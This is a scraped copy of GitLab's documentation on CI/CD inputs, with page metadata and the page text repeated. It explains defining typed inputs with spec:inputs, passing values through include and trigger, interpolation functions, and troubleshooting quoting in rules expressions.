'component.yml' inputs: first_needs: - build1 second_needs: - build2 ``` When the pipeline starts, the items in the `needs` array for `test_job` get concatenated into: ```yaml test_job: script: echo "this job has needs" needs: - build1 - build2 ``` ### Allow `needs` to be expanded when included You can have [`needs`](../yaml/_index.md#needs) in an included job, but also add additional jobs to the `needs` array with `spec:inputs`. For example: ```yaml spec: inputs: test_job_needs: type: array default: [] --- build-job: script: - echo "My build job" test-job: script: - echo "My test job" needs: - build-job - $[[ inputs.test_job_needs ]] ``` In this example: - `test-job` job always needs `build-job`. - By default the test job doesn't need any other jobs, as the `test_job_needs:` array input is empty by default. To set `test-job` to need another job in your configuration, add it to the `test_needs` input when you include the file. For example: ```yaml include: - component: $CI_SERVER_FQDN/project/path/component@1.0.0 inputs: test_job_needs: [my-other-job] my-other-job: script: - echo "I want build-job` in the component to need this job too" ``` ### Add `needs` to an included job that doesn't have `needs` You can add [`needs`](../yaml/_index.md#needs) to an included job that does not have `needs` already defined. For example, in a CI/CD component's configuration: ```yaml spec: inputs: test_job: default: test-job --- build-job: script: - echo "My build job" "$[[ inputs.test_job ]]": script: - echo "My test job" ``` In this example, the `spec:inputs` section allows the job name to be customized. Then, after you include the component, you can extend the job with the additional `needs` configuration. For example: ```yaml include: - component: $CI_SERVER_FQDN/project/path/component@1.0.0 inputs: test_job: my-test-job my-test-job: needs: [my-other-job] my-other-job: script: - echo "I want `my-test-job` to need this job" ``` ## Use `inputs` with `include` for more dynamic pipelines You can use `inputs` with `include` to select which additional pipeline configuration files to include. For example: ```yaml spec: inputs: pipeline-type: type: string default: development options: ['development', 'canary', 'production'] description: "The pipeline type, which determines which set of jobs to include." --- include: - local: .gitlab/ci/$[[ inputs.pipeline-type ]].gitlab-ci.yml ``` In this example, the `.gitlab/ci/development.gitlab-ci.yml` file is included by default. But if a different `pipeline-type` input option is used, a different configuration file is included. ### Use CI/CD inputs in variable expressions You can use [CI/CD inputs](_index.md) to customize variable expressions. For example: ```yaml example-job: script: echo "Testing" rules: - if: '"$[[ inputs.some_example ]]" == "test-branch"' ``` The expression is evaluated in two steps: 1. Input interpolation: Before the pipeline is created, inputs are replaced with the input value. In this example, the `$[[ inputs.some_example ]]` input is replaced with the [set value](_index.md#set-input-values). For example, if the value is: - `test-branch`, the expression becomes `if: '"test-branch" == "test-branch"'`. - `$CI_COMMIT_BRANCH`, the expression becomes `if: '"$CI_COMMIT_BRANCH" == "test-branch"'`. 1. Expression evaluation: After the inputs are interpolated, GitLab attempts to create the pipeline. During pipeline creation, the expressions are evaluated to determine which jobs to add to the pipeline.
https://docs.gitlab.com/ci/inputs
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/inputs
[ "doc", "ci", "inputs" ]
_index.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
CI/CD inputs
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/391331) in GitLab 15.11 as a beta feature. - [Made generally available](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/134062) in GitLab 17.0. {{< /history >}} Use CI/CD inputs to increase the flexibility of CI/CD configuration. Inputs and [CI/CD variables](../variables/_index.md) can be used in similar ways, but have different benefits: - Inputs provide typed parameters for reusable templates with built-in validation at pipeline creation time. To define specific values when the pipeline runs, use inputs instead of CI/CD variables. - CI/CD variables offer flexible values that can be defined at multiple levels, but can be modified throughout pipeline execution. Use variables for values that need to be accessible in the job's runtime environment. You can also use [predefined variables](../variables/predefined_variables.md) with `rules` for dynamic pipeline configuration. ## CI/CD Inputs and variables comparison Inputs: - **Purpose**: Defined in CI configurations (templates, components or `.gitlab-ci.yml`) and assigned values when a pipeline is triggered, allowing consumers to customize reusable CI configurations. - **Modification**: Once passed at pipeline initialization, input values are interpolated in the CI/CD configuration and remain fixed for the entire pipeline run. - **Scope**: Available only in the file they are defined, whether in the `.gitlab-ci.yml` or a file being `include`d. You can pass them explicitly to other files - using `include:inputs` - or pipeline using `trigger:inputs`. - **Validation**: Provide robust validation capabilities including type checking, regex patterns, predefined option lists, and helpful descriptions for users. CI/CD Variables: - **Purpose**: Values that can be set as environment variables during job execution and in various parts of the pipeline for passing data between jobs. - **Modification**: Can be dynamically generated or modified during pipeline execution through dotenv artifacts, conditional rules, or directly in job scripts. - **Scope**: Can be defined globally (affecting all jobs), at the job level (affecting only specific jobs), or for the entire project or group through the GitLab UI. - **Validation**: Simple key-value pairs with minimal built-in validation, though you can add some controls through the GitLab UI for project variables. ## Define input parameters with `spec:inputs` Use `spec:inputs` in the CI/CD configuration [header](../yaml/_index.md#header-keywords) to define input parameters that can be passed to the configuration file. Use the `$[[ inputs.input-id ]]` interpolation format outside the header section to declare where to use the inputs. For example: ```yaml spec: inputs: job-stage: default: test environment: default: production --- scan-website: stage: $[[ inputs.job-stage ]] script: ./scan-website $[[ inputs.environment ]] ``` In this example, the inputs are `job-stage` and `environment`. With `spec:inputs`: - Inputs are mandatory if `default` is not specified. - Inputs are evaluated and populated when the configuration is fetched during pipeline creation. - A string containing an input must be less than 1 MB. - A string inside an input must be less than 1 KB. - Inputs can use CI/CD variables, but have the same [variable limitations as the `include` keyword](../yaml/includes.md#use-variables-with-include). Then you set the values for the inputs when you: - [Trigger a new pipeline](#for-a-pipeline) using this configuration file. You should always set default values when using inputs to configure new pipelines with any method other than `include`. Otherwise the pipeline could fail to start if a new pipeline triggers automatically, including in: - Merge request pipelines - Branch pipelines - Tag pipelines - [Include the configuration](#for-configuration-added-with-include) in your pipeline. Any inputs that are mandatory must be added to the `include:inputs` section, and are used every time the configuration is included. ### Input configuration To configure inputs, use: - [`spec:inputs:default`](../yaml/_index.md#specinputsdefault) to define default values for inputs when not specified. When you specify a default, the inputs are no longer mandatory. - [`spec:inputs:description`](../yaml/_index.md#specinputsdescription) to give a description to a specific input. The description does not affect the input, but can help people understand the input details or expected values. - [`spec:inputs:options`](../yaml/_index.md#specinputsoptions) to specify a list of allowed values for an input. - [`spec:inputs:regex`](../yaml/_index.md#specinputsregex) to specify a regular expression that the input must match. - [`spec:inputs:type`](../yaml/_index.md#specinputstype) to force a specific input type, which can be `string` (default when not specified), `array`, `number`, or `boolean`. You can define multiple inputs per CI/CD configuration file, and each input can have multiple configuration parameters. For example, in a file named `scan-website-job.yml`: ```yaml spec: inputs: job-prefix: # Mandatory string input description: "Define a prefix for the job name" job-stage: # Optional string input with a default value when not provided default: test environment: # Mandatory input that must match one of the options options: ['test', 'staging', 'production'] concurrency: type: number # Optional numeric input with a default value when not provided default: 1 version: # Mandatory string input that must match the regular expression type: string regex: ^v\d\.\d+(\.\d+)$ export_results: # Optional boolean input with a default value when not provided type: boolean default: true --- "$[[ inputs.job-prefix ]]-scan-website": stage: $[[ inputs.job-stage ]] script: - echo "scanning website -e $[[ inputs.environment ]] -c $[[ inputs.concurrency ]] -v $[[ inputs.version ]]" - if $[[ inputs.export_results ]]; then echo "export results"; fi ``` In this example: - `job-prefix` is a mandatory string input and must be defined. - `job-stage` is optional. If not defined, the value is `test`. - `environment` is a mandatory string input that must match one of the defined options. - `concurrency` is an optional numeric input. When not specified, it defaults to `1`. - `version` is a mandatory string input that must match the specified regular expression. - `export_results` is an optional boolean input. When not specified, it defaults to `true`. ### Input types You can specify that an input must use a specific type with the optional `spec:inputs:type` keyword. The input types are: - [`array`](#array-type) - `boolean` - `number` - `string` (default when not specified) When an input replaces an entire YAML value in the CI/CD configuration, it is interpolated into the configuration as its specified type. For example: ```yaml spec: inputs: array_input: type: array boolean_input: type: boolean number_input: type: number string_input: type: string --- test_job: allow_failure: $[[ inputs.boolean_input ]] needs: $[[ inputs.array_input ]] parallel: $[[ inputs.number_input ]] script: $[[ inputs.string_input ]] ``` When an input is inserted into a YAML value as part of a larger string, the input is always interpolated as a string. For example: ```yaml spec: inputs: port: type: number --- test_job: script: curl "https://gitlab.com:$[[ inputs.port ]]" ``` #### Array type {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/407176) in GitLab 16.11. {{< /history >}} The content of the items in an array type can be any valid YAML map, sequence, or scalar. More complex YAML features like [`!reference`](../yaml/yaml_optimization.md#reference-tags) cannot be used. When using the value of an array input in a string (for example `echo "My rules: $[[ inputs.rules-config ]]"` in your `script:` section), you might see unexpected results. The array input is converted to its string representation, which might not match your expectations for complex YAML structures such as maps. ```yaml spec: inputs: rules-config: type: array default: - if: $CI_PIPELINE_SOURCE == "merge_request_event" when: manual - if: $CI_PIPELINE_SOURCE == "schedule" --- test_job: rules: $[[ inputs.rules-config ]] script: ls ``` Array inputs must be formatted as JSON, for example `["array-input-1", "array-input-2"]`, when manually passing inputs for: - [Manually triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually). - Git [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd) - [Pipeline schedules](../pipelines/schedules.md#add-a-pipeline-schedule) #### Multi-line input string values Inputs support different value types. You can pass multi-string values using the following format: ```yaml spec: inputs: closed_message: description: Message to announce when an issue is closed. default: 'Hi {{author}} :wave:, Based on the policy for inactive issues, this is now being closed. If this issue requires further attention, reopen this issue.' --- ``` ## Set input values ### For configuration added with `include` {{< history >}} - `include:with` [renamed to `include:inputs`](https://gitlab.com/gitlab-org/gitlab/-/issues/406780) in GitLab 16.0. {{< /history >}} Use [`include:inputs`](../yaml/_index.md#includeinputs) to set the values for inputs when the included configuration is added to the pipeline, including for: - [CI/CD components](../components/_index.md) - [Custom CI/CD templates](../examples/_index.md#adding-templates-to-your-gitlab-installation) - Any other configuration added with `include`. For example, to include and set the input values for `scan-website-job.yml` from the [input configuration example](#input-configuration): ```yaml include: - local: 'scan-website-job.yml' inputs: job-prefix: 'some-service-' environment: 'staging' concurrency: 2 version: 'v1.3.2' export_results: false ``` In this example, the inputs for the included configuration are: | Input | Value | Details | |------------------|-----------------|---------| | `job-prefix` | `some-service-` | Must be explicitly defined. | | `job-stage` | `test` | Not defined in `include:inputs`, so the value comes from `spec:inputs:default` in the included configuration. | | `environment` | `staging` | Must be explicitly defined, and must match one of the values in `spec:inputs:options` in the included configuration. | | `concurrency` | `2` | Must be a numeric value to match the `spec:inputs:type` set to `number` in the included configuration. Overrides the default value. | | `version` | `v1.3.2` | Must be explicitly defined, and must match the regular expression in the `spec:inputs:regex` in the included configuration. | | `export_results` | `false` | Must be either `true` or `false` to match the `spec:inputs:type` set to `boolean` in the included configuration. Overrides the default value. | #### With multiple `include` entries Inputs must be specified separately for each include entry. For example: ```yaml include: - component: $CI_SERVER_FQDN/the-namespace/the-project/the-component@1.0 inputs: stage: my-stage - local: path/to/file.yml inputs: stage: my-stage ``` ### For a pipeline {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16321) in GitLab 17.11. {{< /history >}} Inputs provide advantages over variables including type checking, validation and a clear contract. Unexpected inputs are rejected. Inputs for pipelines must be defined in the [`spec:inputs` header](#define-input-parameters-with-specinputs) of the main `.gitlab-ci.yml` file. You cannot use inputs defined in included files for pipeline-level configuration. {{< alert type="note" >}} In [GitLab 17.7](../../update/deprecations.md#increased-default-security-for-use-of-pipeline-variables) and later, pipeline inputs are recommended over passing [pipeline variables](../variables/_index.md#use-pipeline-variables). For enhanced security, you should [disable pipeline variables](../variables/_index.md#restrict-pipeline-variables) when using inputs. {{< /alert >}} You should always set default values when defining inputs for pipelines. Otherwise the pipeline could fail to start if a new pipeline triggers automatically. For example, merge request pipelines can trigger for changes to a merge request's source branch. You cannot manually set inputs for merge request pipelines, so if any input is missing a default, the pipeline fails to create. This can also happen for branch pipelines, tag pipelines, and other automatically triggered pipelines. You can set input values with: - [Downstream pipelines](../pipelines/downstream_pipelines.md#pass-inputs-to-a-downstream-pipeline) - [Manually triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually). - The [pipeline triggers API](../../api/pipeline_triggers.md#trigger-a-pipeline-with-a-token) - The [pipelines API](../../api/pipelines.md#create-a-new-pipeline) - Git [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd) - [Pipeline schedules](../pipelines/schedules.md#add-a-pipeline-schedule) - The [`trigger` keyword](../pipelines/downstream_pipelines.md#pass-inputs-to-a-downstream-pipeline) A pipeline can take up to 20 inputs. Feedback is welcome on [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/533802). You can pass inputs to [downstream pipelines](../pipelines/downstream_pipelines.md), if the downstream pipeline's configuration file uses [`spec:inputs`](#define-input-parameters-with-specinputs). For example, with [`trigger:inputs`](../yaml/_index.md#triggerinputs): {{< tabs >}} {{< tab title="Parent-child pipeline" >}} ```yaml trigger-job: trigger: strategy: mirror include: - local: path/to/child-pipeline.yml inputs: job-name: "defined" rules: - if: $CI_PIPELINE_SOURCE == 'merge_request_event' ``` {{< /tab >}} {{< tab title="Multi-project pipeline" >}} ```yaml trigger-job: trigger: strategy: mirror project: project-group/my-downstream-project inputs: job-name: "defined" rules: - if: $CI_PIPELINE_SOURCE == 'merge_request_event' ``` {{< /tab >}} {{< /tabs >}} ## Specify functions to manipulate input values {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/409462) in GitLab 16.3. {{< /history >}} You can specify predefined functions in the interpolation block to manipulate the input value. The format supported is the following: ```yaml $[[ input.input-id | <function1> | <function2> | ... <functionN> ]] ``` With functions: - Only [predefined interpolation functions](#predefined-interpolation-functions) are permitted. - A maximum of 3 functions may be specified in a single interpolation block. - The functions are executed in the sequence they are specified. ```yaml spec: inputs: test: default: 'test $MY_VAR' --- test-job: script: echo $[[ inputs.test | expand_vars | truncate(5,8) ]] ``` In this example, assuming the input uses the default value and `$MY_VAR` is an unmasked project variable with value `my value`: 1. First, the function [`expand_vars`](#expand_vars) expands the value to `test my value`. 1. Then [`truncate`](#truncate) applies to `test my value` with a character offset of `5` and length `8`. 1. The output of `script` would be `echo my value`. ### Predefined interpolation functions #### `expand_vars` {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/387632) in GitLab 16.5. {{< /history >}} Use `expand_vars` to expand [CI/CD variables](../variables/_index.md) in the input value. Only variables you can [use with the `include` keyword](../yaml/includes.md#use-variables-with-include) and which are **not** [masked](../variables/_index.md#mask-a-cicd-variable) can be expanded. [Nested variable expansion](../variables/where_variables_can_be_used.md#nested-variable-expansion) is not supported. Example: ```yaml spec: inputs: test: default: 'test $MY_VAR' --- test-job: script: echo $[[ inputs.test | expand_vars ]] ``` In this example, if `$MY_VAR` is unmasked (exposed in job logs) with a value of `my value`, then the input would expand to `test my value`. #### `truncate` {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/409462) in GitLab 16.3. {{< /history >}} Use `truncate` to shorten the interpolated value. For example: - `truncate(<offset>,<length>)` | Name | Type | Description | | ---- | ---- | ----------- | | `offset` | Integer | Number of characters to offset by. | | `length` | Integer | Number of characters to return after the offset. | Example: ```yaml $[[ inputs.test | truncate(3,5) ]] ``` Assuming the value of `inputs.test` is `0123456789`, then the output would be `34567`. ## Troubleshooting ### YAML syntax errors when using `inputs` [CI/CD variable expressions](../jobs/job_rules.md#cicd-variable-expressions) in `rules:if` expect a comparison of a CI/CD variable with a string, otherwise [a variety of syntax errors could be returned](../jobs/job_troubleshooting.md#this-gitlab-ci-configuration-is-invalid-for-variable-expressions). You must ensure that expressions remain properly formatted after input values are inserted into the configuration, which might require the use of additional quote characters. For example: ```yaml spec: inputs: branch: default: $CI_DEFAULT_BRANCH --- job-name: rules: - if: $CI_COMMIT_REF_NAME == $[[ inputs.branch ]] ``` In this example: - Using `include: inputs: branch: $CI_DEFAULT_BRANCH` is valid. The `if:` clause evaluates to `if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH`, which is a valid variable expression. - Using `include: inputs: branch: main` is **invalid**. The `if:` clause evaluates to `if: $CI_COMMIT_REF_NAME == main`, which is invalid because `main` is a string but is not quoted. Alternatively, add quotes to resolve some variable expression issues. For example: ```yaml spec: inputs: environment: default: "$ENVIRONMENT" --- $[[ inputs.environment | expand_vars ]] job: script: echo rules: - if: '"$[[ inputs.environment | expand_vars ]]" == "production"' ``` In this example, quoting the input block and also the entire variable expression ensures valid `if:` syntax after the input is evaluated. The internal and external quotes in the expression must not be the same character. You can use `"` for the internal quotes and `'` for the external quotes, or the inverse. On the other hand, the job name does not require any quoting.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: CI/CD inputs breadcrumbs: - doc - ci - inputs --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/391331) in GitLab 15.11 as a beta feature. - [Made generally available](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/134062) in GitLab 17.0. {{< /history >}} Use CI/CD inputs to increase the flexibility of CI/CD configuration. Inputs and [CI/CD variables](../variables/_index.md) can be used in similar ways, but have different benefits: - Inputs provide typed parameters for reusable templates with built-in validation at pipeline creation time. To define specific values when the pipeline runs, use inputs instead of CI/CD variables. - CI/CD variables offer flexible values that can be defined at multiple levels, but can be modified throughout pipeline execution. Use variables for values that need to be accessible in the job's runtime environment. You can also use [predefined variables](../variables/predefined_variables.md) with `rules` for dynamic pipeline configuration. ## CI/CD Inputs and variables comparison Inputs: - **Purpose**: Defined in CI configurations (templates, components or `.gitlab-ci.yml`) and assigned values when a pipeline is triggered, allowing consumers to customize reusable CI configurations. - **Modification**: Once passed at pipeline initialization, input values are interpolated in the CI/CD configuration and remain fixed for the entire pipeline run. - **Scope**: Available only in the file they are defined, whether in the `.gitlab-ci.yml` or a file being `include`d. You can pass them explicitly to other files - using `include:inputs` - or pipeline using `trigger:inputs`. - **Validation**: Provide robust validation capabilities including type checking, regex patterns, predefined option lists, and helpful descriptions for users. CI/CD Variables: - **Purpose**: Values that can be set as environment variables during job execution and in various parts of the pipeline for passing data between jobs. - **Modification**: Can be dynamically generated or modified during pipeline execution through dotenv artifacts, conditional rules, or directly in job scripts. - **Scope**: Can be defined globally (affecting all jobs), at the job level (affecting only specific jobs), or for the entire project or group through the GitLab UI. - **Validation**: Simple key-value pairs with minimal built-in validation, though you can add some controls through the GitLab UI for project variables. ## Define input parameters with `spec:inputs` Use `spec:inputs` in the CI/CD configuration [header](../yaml/_index.md#header-keywords) to define input parameters that can be passed to the configuration file. Use the `$[[ inputs.input-id ]]` interpolation format outside the header section to declare where to use the inputs. For example: ```yaml spec: inputs: job-stage: default: test environment: default: production --- scan-website: stage: $[[ inputs.job-stage ]] script: ./scan-website $[[ inputs.environment ]] ``` In this example, the inputs are `job-stage` and `environment`. With `spec:inputs`: - Inputs are mandatory if `default` is not specified. - Inputs are evaluated and populated when the configuration is fetched during pipeline creation. - A string containing an input must be less than 1 MB. - A string inside an input must be less than 1 KB. - Inputs can use CI/CD variables, but have the same [variable limitations as the `include` keyword](../yaml/includes.md#use-variables-with-include). Then you set the values for the inputs when you: - [Trigger a new pipeline](#for-a-pipeline) using this configuration file. You should always set default values when using inputs to configure new pipelines with any method other than `include`. Otherwise the pipeline could fail to start if a new pipeline triggers automatically, including in: - Merge request pipelines - Branch pipelines - Tag pipelines - [Include the configuration](#for-configuration-added-with-include) in your pipeline. Any inputs that are mandatory must be added to the `include:inputs` section, and are used every time the configuration is included. ### Input configuration To configure inputs, use: - [`spec:inputs:default`](../yaml/_index.md#specinputsdefault) to define default values for inputs when not specified. When you specify a default, the inputs are no longer mandatory. - [`spec:inputs:description`](../yaml/_index.md#specinputsdescription) to give a description to a specific input. The description does not affect the input, but can help people understand the input details or expected values. - [`spec:inputs:options`](../yaml/_index.md#specinputsoptions) to specify a list of allowed values for an input. - [`spec:inputs:regex`](../yaml/_index.md#specinputsregex) to specify a regular expression that the input must match. - [`spec:inputs:type`](../yaml/_index.md#specinputstype) to force a specific input type, which can be `string` (default when not specified), `array`, `number`, or `boolean`. You can define multiple inputs per CI/CD configuration file, and each input can have multiple configuration parameters. For example, in a file named `scan-website-job.yml`: ```yaml spec: inputs: job-prefix: # Mandatory string input description: "Define a prefix for the job name" job-stage: # Optional string input with a default value when not provided default: test environment: # Mandatory input that must match one of the options options: ['test', 'staging', 'production'] concurrency: type: number # Optional numeric input with a default value when not provided default: 1 version: # Mandatory string input that must match the regular expression type: string regex: ^v\d\.\d+(\.\d+)$ export_results: # Optional boolean input with a default value when not provided type: boolean default: true --- "$[[ inputs.job-prefix ]]-scan-website": stage: $[[ inputs.job-stage ]] script: - echo "scanning website -e $[[ inputs.environment ]] -c $[[ inputs.concurrency ]] -v $[[ inputs.version ]]" - if $[[ inputs.export_results ]]; then echo "export results"; fi ``` In this example: - `job-prefix` is a mandatory string input and must be defined. - `job-stage` is optional. If not defined, the value is `test`. - `environment` is a mandatory string input that must match one of the defined options. - `concurrency` is an optional numeric input. When not specified, it defaults to `1`. - `version` is a mandatory string input that must match the specified regular expression. - `export_results` is an optional boolean input. When not specified, it defaults to `true`. ### Input types You can specify that an input must use a specific type with the optional `spec:inputs:type` keyword. The input types are: - [`array`](#array-type) - `boolean` - `number` - `string` (default when not specified) When an input replaces an entire YAML value in the CI/CD configuration, it is interpolated into the configuration as its specified type. For example: ```yaml spec: inputs: array_input: type: array boolean_input: type: boolean number_input: type: number string_input: type: string --- test_job: allow_failure: $[[ inputs.boolean_input ]] needs: $[[ inputs.array_input ]] parallel: $[[ inputs.number_input ]] script: $[[ inputs.string_input ]] ``` When an input is inserted into a YAML value as part of a larger string, the input is always interpolated as a string. For example: ```yaml spec: inputs: port: type: number --- test_job: script: curl "https://gitlab.com:$[[ inputs.port ]]" ``` #### Array type {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/407176) in GitLab 16.11. {{< /history >}} The content of the items in an array type can be any valid YAML map, sequence, or scalar. More complex YAML features like [`!reference`](../yaml/yaml_optimization.md#reference-tags) cannot be used. When using the value of an array input in a string (for example `echo "My rules: $[[ inputs.rules-config ]]"` in your `script:` section), you might see unexpected results. The array input is converted to its string representation, which might not match your expectations for complex YAML structures such as maps. ```yaml spec: inputs: rules-config: type: array default: - if: $CI_PIPELINE_SOURCE == "merge_request_event" when: manual - if: $CI_PIPELINE_SOURCE == "schedule" --- test_job: rules: $[[ inputs.rules-config ]] script: ls ``` Array inputs must be formatted as JSON, for example `["array-input-1", "array-input-2"]`, when manually passing inputs for: - [Manually triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually). - Git [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd) - [Pipeline schedules](../pipelines/schedules.md#add-a-pipeline-schedule) #### Multi-line input string values Inputs support different value types. You can pass multi-string values using the following format: ```yaml spec: inputs: closed_message: description: Message to announce when an issue is closed. default: 'Hi {{author}} :wave:, Based on the policy for inactive issues, this is now being closed. If this issue requires further attention, reopen this issue.' --- ``` ## Set input values ### For configuration added with `include` {{< history >}} - `include:with` [renamed to `include:inputs`](https://gitlab.com/gitlab-org/gitlab/-/issues/406780) in GitLab 16.0. {{< /history >}} Use [`include:inputs`](../yaml/_index.md#includeinputs) to set the values for inputs when the included configuration is added to the pipeline, including for: - [CI/CD components](../components/_index.md) - [Custom CI/CD templates](../examples/_index.md#adding-templates-to-your-gitlab-installation) - Any other configuration added with `include`. For example, to include and set the input values for `scan-website-job.yml` from the [input configuration example](#input-configuration): ```yaml include: - local: 'scan-website-job.yml' inputs: job-prefix: 'some-service-' environment: 'staging' concurrency: 2 version: 'v1.3.2' export_results: false ``` In this example, the inputs for the included configuration are: | Input | Value | Details | |------------------|-----------------|---------| | `job-prefix` | `some-service-` | Must be explicitly defined. | | `job-stage` | `test` | Not defined in `include:inputs`, so the value comes from `spec:inputs:default` in the included configuration. | | `environment` | `staging` | Must be explicitly defined, and must match one of the values in `spec:inputs:options` in the included configuration. | | `concurrency` | `2` | Must be a numeric value to match the `spec:inputs:type` set to `number` in the included configuration. Overrides the default value. | | `version` | `v1.3.2` | Must be explicitly defined, and must match the regular expression in the `spec:inputs:regex` in the included configuration. | | `export_results` | `false` | Must be either `true` or `false` to match the `spec:inputs:type` set to `boolean` in the included configuration. Overrides the default value. | #### With multiple `include` entries Inputs must be specified separately for each include entry. For example: ```yaml include: - component: $CI_SERVER_FQDN/the-namespace/the-project/the-component@1.0 inputs: stage: my-stage - local: path/to/file.yml inputs: stage: my-stage ``` ### For a pipeline {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16321) in GitLab 17.11. {{< /history >}} Inputs provide advantages over variables including type checking, validation and a clear contract. Unexpected inputs are rejected. Inputs for pipelines must be defined in the [`spec:inputs` header](#define-input-parameters-with-specinputs) of the main `.gitlab-ci.yml` file. You cannot use inputs defined in included files for pipeline-level configuration. {{< alert type="note" >}} In [GitLab 17.7](../../update/deprecations.md#increased-default-security-for-use-of-pipeline-variables) and later, pipeline inputs are recommended over passing [pipeline variables](../variables/_index.md#use-pipeline-variables). For enhanced security, you should [disable pipeline variables](../variables/_index.md#restrict-pipeline-variables) when using inputs. {{< /alert >}} You should always set default values when defining inputs for pipelines. Otherwise the pipeline could fail to start if a new pipeline triggers automatically. For example, merge request pipelines can trigger for changes to a merge request's source branch. You cannot manually set inputs for merge request pipelines, so if any input is missing a default, the pipeline fails to create. This can also happen for branch pipelines, tag pipelines, and other automatically triggered pipelines. You can set input values with: - [Downstream pipelines](../pipelines/downstream_pipelines.md#pass-inputs-to-a-downstream-pipeline) - [Manually triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually). - The [pipeline triggers API](../../api/pipeline_triggers.md#trigger-a-pipeline-with-a-token) - The [pipelines API](../../api/pipelines.md#create-a-new-pipeline) - Git [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd) - [Pipeline schedules](../pipelines/schedules.md#add-a-pipeline-schedule) - The [`trigger` keyword](../pipelines/downstream_pipelines.md#pass-inputs-to-a-downstream-pipeline) A pipeline can take up to 20 inputs. Feedback is welcome on [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/533802). You can pass inputs to [downstream pipelines](../pipelines/downstream_pipelines.md), if the downstream pipeline's configuration file uses [`spec:inputs`](#define-input-parameters-with-specinputs). For example, with [`trigger:inputs`](../yaml/_index.md#triggerinputs): {{< tabs >}} {{< tab title="Parent-child pipeline" >}} ```yaml trigger-job: trigger: strategy: mirror include: - local: path/to/child-pipeline.yml inputs: job-name: "defined" rules: - if: $CI_PIPELINE_SOURCE == 'merge_request_event' ``` {{< /tab >}} {{< tab title="Multi-project pipeline" >}} ```yaml trigger-job: trigger: strategy: mirror project: project-group/my-downstream-project inputs: job-name: "defined" rules: - if: $CI_PIPELINE_SOURCE == 'merge_request_event' ``` {{< /tab >}} {{< /tabs >}} ## Specify functions to manipulate input values {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/409462) in GitLab 16.3. {{< /history >}} You can specify predefined functions in the interpolation block to manipulate the input value. The format supported is the following: ```yaml $[[ input.input-id | <function1> | <function2> | ... <functionN> ]] ``` With functions: - Only [predefined interpolation functions](#predefined-interpolation-functions) are permitted. - A maximum of 3 functions may be specified in a single interpolation block. - The functions are executed in the sequence they are specified. ```yaml spec: inputs: test: default: 'test $MY_VAR' --- test-job: script: echo $[[ inputs.test | expand_vars | truncate(5,8) ]] ``` In this example, assuming the input uses the default value and `$MY_VAR` is an unmasked project variable with value `my value`: 1. First, the function [`expand_vars`](#expand_vars) expands the value to `test my value`. 1. Then [`truncate`](#truncate) applies to `test my value` with a character offset of `5` and length `8`. 1. The output of `script` would be `echo my value`. ### Predefined interpolation functions #### `expand_vars` {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/387632) in GitLab 16.5. {{< /history >}} Use `expand_vars` to expand [CI/CD variables](../variables/_index.md) in the input value. Only variables you can [use with the `include` keyword](../yaml/includes.md#use-variables-with-include) and which are **not** [masked](../variables/_index.md#mask-a-cicd-variable) can be expanded. [Nested variable expansion](../variables/where_variables_can_be_used.md#nested-variable-expansion) is not supported. Example: ```yaml spec: inputs: test: default: 'test $MY_VAR' --- test-job: script: echo $[[ inputs.test | expand_vars ]] ``` In this example, if `$MY_VAR` is unmasked (exposed in job logs) with a value of `my value`, then the input would expand to `test my value`. #### `truncate` {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/409462) in GitLab 16.3. {{< /history >}} Use `truncate` to shorten the interpolated value. For example: - `truncate(<offset>,<length>)` | Name | Type | Description | | ---- | ---- | ----------- | | `offset` | Integer | Number of characters to offset by. | | `length` | Integer | Number of characters to return after the offset. | Example: ```yaml $[[ inputs.test | truncate(3,5) ]] ``` Assuming the value of `inputs.test` is `0123456789`, then the output would be `34567`. ## Troubleshooting ### YAML syntax errors when using `inputs` [CI/CD variable expressions](../jobs/job_rules.md#cicd-variable-expressions) in `rules:if` expect a comparison of a CI/CD variable with a string, otherwise [a variety of syntax errors could be returned](../jobs/job_troubleshooting.md#this-gitlab-ci-configuration-is-invalid-for-variable-expressions). You must ensure that expressions remain properly formatted after input values are inserted into the configuration, which might require the use of additional quote characters. For example: ```yaml spec: inputs: branch: default: $CI_DEFAULT_BRANCH --- job-name: rules: - if: $CI_COMMIT_REF_NAME == $[[ inputs.branch ]] ``` In this example: - Using `include: inputs: branch: $CI_DEFAULT_BRANCH` is valid. The `if:` clause evaluates to `if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH`, which is a valid variable expression. - Using `include: inputs: 